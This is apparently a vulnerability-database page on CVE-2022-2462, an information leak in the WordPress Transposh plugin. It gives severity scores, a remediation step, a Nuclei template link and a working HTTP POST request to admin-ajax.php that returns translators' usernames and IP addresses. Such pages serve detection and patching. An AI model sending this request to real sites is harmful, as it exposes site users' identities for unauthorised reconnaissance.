🔙 목록으로 돌아가기

CVE-2022-2462: WordPress Transposh <=1.0.8.1 - Information Disclosure

TitleWordPress Transposh <=1.0.8.1 - Information Disclosure
Authordwisiswant0
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain sensitive information from the target system.
RemediationUpgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability.
CVSS Score5.3
EPSS Score0.04027
CVE IDCVE-2022-2462
CWE IDCWE-200
Tags cve cve2022 wordpress disclosure wp-plugin packetstorm transposh xss vuln

🔍 Vulnerability Description

WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user’s login name as part of the user_login attribute. If an anonymous user submits the translation, the user’s IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 32
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=tp_history&token=&lang=en

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2462.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2462.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A